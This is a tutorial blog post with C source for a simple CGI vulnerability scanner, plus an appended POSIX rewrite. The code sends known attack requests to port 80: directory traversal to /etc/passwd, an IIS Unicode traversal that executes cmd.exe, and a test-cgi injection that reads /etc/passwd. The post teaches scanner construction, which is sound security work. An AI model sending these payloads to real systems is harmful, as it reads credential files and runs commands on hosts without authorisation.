Date: 2021-07-31 Author: daque
1. Vulnerability scanner basics:

A vulnerability scanner probes a remote server for files that are known to be a security risk. Its socket setup is the same as that of the port scanner above; the difference is that the vulnerability scanner normally talks to port 80 and sends a GET request for a specific file. If the file exists, the server returns its contents; if it does not, the server returns an error response. Examining what comes back therefore tells us whether the file exists. Sending and receiving data uses the functions send() and recv(), and testing whether a particular string occurs in the received stream uses strstr(), so besides the socket library this needs a little knowledge of the C string library.

2. Simple vulnerability scanner source code:

/********************************************/
/*   CGI vulnerability scanner source code  */
/*            cgiscanner.cpp                */
/********************************************/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <winsock.h>

int main(int argc, char *argv[])
{
    struct sockaddr_in blah;
    struct hostent *he;
    WSADATA wsaData;
    WORD wVersionRequested;
    SOCKET sock;
    int i, n;
    char buff[1024];
    char *ex[10];
    /* One GET request per check; a 200 reply means the server served that path */
    ex[1] = "GET /../../../../etc/passwd HTTP/1.0\n\n";
    ex[2] = "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\\ HTTP/1.0\n\n";
    ex[3] = "GET /a.ida/%c1%00.ida HTTP/1.0\n\n";
    ex[4] = "GET /cgi-bin/pfdispaly.cgi?/../../../../etc/motd HTTP/1.0\n\n";
    ex[5] = "GET /cgi-bin/test-cgi?\\help&0a/bin/cat%20/etc/passwd HTTP/1.0\n\n";
    ex[6] = "GET /cgi-bin/test-cgi?* HTTP/1.0\n\n";
    char *fmsg = "HTTP/1.1 200 OK";   /* this status line in the reply counts as "found" */

    if (argc != 2) {
        printf("usage : scan [ip address]\n");
        return 1;
    }
    wVersionRequested = MAKEWORD(1, 1);
    if (WSAStartup(wVersionRequested, &wsaData)) {
        printf("winsock initialization failed.\n");
        exit(1);
    }
    /* Resolve a host name, or fall back to a dotted-quad address */
    blah.sin_family = AF_INET;
    blah.sin_port = htons(80);
    if ((he = gethostbyname(argv[1])) != NULL) {
        memcpy((char *)&blah.sin_addr.s_addr, he->h_addr, he->h_length);
    } else if ((blah.sin_addr.s_addr = inet_addr(argv[1])) == INADDR_NONE) {
        printf("can not resolve %s.\n", argv[1]);
        WSACleanup();
        exit(1);
    }
    /* HTTP/1.0 servers close the connection after each reply, so open a fresh socket per check */
    for (i = 1; i < 7; i++) {
        if ((sock = socket(AF_INET, SOCK_STREAM, 0)) == INVALID_SOCKET) {
            printf("can not create socket.\n");
            break;
        }
        if (connect(sock, (struct sockaddr *)&blah, sizeof(blah)) == 0) {
            send(sock, ex[i], strlen(ex[i]), 0);
            n = recv(sock, buff, sizeof(buff) - 1, 0);
            if (n > 0) {
                buff[n] = '\0';   /* recv() does not NUL-terminate; strstr() needs it */
                if (strstr(buff, fmsg) != NULL)
                    printf("\nfound :%s\n", ex[i]);
            }
        }
        closesocket(sock);
    }
    WSACleanup();
    return 0;
}
This code checks for six vulnerabilities; readers can add or remove checks as they need. The program is very simple. In summary it does four things:
1. connect to the target host (the server);
2. send a GET request to the target;
3. receive the data the target returns;
4. decide from the returned data whether the file exists.

Two caveats when reading the results. The match string "HTTP/1.1 200 OK" misses servers that answer "HTTP/1.0 200 OK", and a 200 status only means the server returned something for that path: a site that serves its default page or a custom error page with status 200 will show every check as "found", so hits should be confirmed by looking at the response body. The requests also carry no Host header, so on a server hosting several name-based virtual hosts they are answered by the default host only.
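The same four steps, as an added example that is not the article's code, written against POSIX sockets rather than Winsock. It differs from the program above in the places that matter for correctness: it sends a well-formed request with CRLF line endings and a Host header, reads until the server closes the connection and NUL-terminates the buffer, and parses the status code from the first line instead of searching the whole reply for "HTTP/1.1 200 OK". The host name and the two probe paths are placeholders; substitute whatever checks you need.

```c
/* Added example, not the original article's code: a POSIX-sockets version
 * of the probe loop. The target host and probe paths are placeholders. */
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <netdb.h>
#include <sys/types.h>
#include <sys/socket.h>

/* Build one HTTP/1.0 request. Returns bytes written, or -1 if it did not fit. */
int build_request(char *out, size_t outlen, const char *host, const char *path)
{
    int n = snprintf(out, outlen, "GET %s HTTP/1.0\r\nHost: %s\r\n\r\n", path, host);
    if (n < 0 || (size_t)n >= outlen)
        return -1;
    return n;
}

/* Parse the status code from the first line of a response. Accepts both
 * HTTP/1.0 and HTTP/1.1 and returns -1 for anything that is not a status
 * line. Only the status line is examined, so an error page whose body
 * happens to contain "200 OK" is not reported as a hit. */
int parse_status(const char *resp)
{
    int major, minor, code;
    if (sscanf(resp, "HTTP/%d.%d %3d", &major, &minor, &code) != 3)
        return -1;
    if (major != 1 || (minor != 0 && minor != 1) || code < 100 || code > 599)
        return -1;
    return code;
}

/* Read the whole reply (up to buflen-1 bytes) and NUL-terminate it. */
ssize_t read_all(int fd, char *buf, size_t buflen)
{
    size_t total = 0;
    while (total < buflen - 1) {
        ssize_t n = recv(fd, buf + total, buflen - 1 - total, 0);
        if (n <= 0)
            break;
        total += (size_t)n;
    }
    buf[total] = '\0';
    return (ssize_t)total;
}

/* One probe: connect, send the GET, read the reply, return its status code
 * or -1. A fresh socket is used per probe because HTTP/1.0 servers close
 * the connection after each response. */
int probe(const char *host, const char *path)
{
    struct addrinfo hints, *res, *ai;
    char req[512], resp[8192];
    int fd = -1, code = -1;

    memset(&hints, 0, sizeof hints);
    hints.ai_family = AF_UNSPEC;
    hints.ai_socktype = SOCK_STREAM;
    if (getaddrinfo(host, "80", &hints, &res) != 0)
        return -1;
    for (ai = res; ai != NULL; ai = ai->ai_next) {
        fd = socket(ai->ai_family, ai->ai_socktype, ai->ai_protocol);
        if (fd < 0)
            continue;
        if (connect(fd, ai->ai_addr, ai->ai_addrlen) == 0)
            break;
        close(fd);
        fd = -1;
    }
    freeaddrinfo(res);
    if (fd < 0)
        return -1;

    int len = build_request(req, sizeof req, host, path);
    if (len > 0 && send(fd, req, (size_t)len, 0) == len && read_all(fd, resp, sizeof resp) > 0)
        code = parse_status(resp);
    close(fd);
    return code;
}

int main(int argc, char *argv[])
{
    /* Placeholder probe paths (assumption); replace with the checks you need. */
    static const char *paths[] = {
        "/../../../../etc/passwd",
        "/cgi-bin/test-cgi?*",
    };
    if (argc != 2) {
        fprintf(stderr, "usage: %s host\n", argv[0]);
        return 1;
    }
    for (size_t i = 0; i < sizeof paths / sizeof paths[0]; i++) {
        int code = probe(argv[1], paths[i]);
        printf("%-30s -> %d%s\n", paths[i], code, code == 200 ? "  (found)" : "");
    }
    return 0;
}
```

Run it as `./scanner hostname`. A 200 from probe() still only says the server answered that path with a success status; as with the article's program, confirm a hit by inspecting the body before calling it a vulnerability.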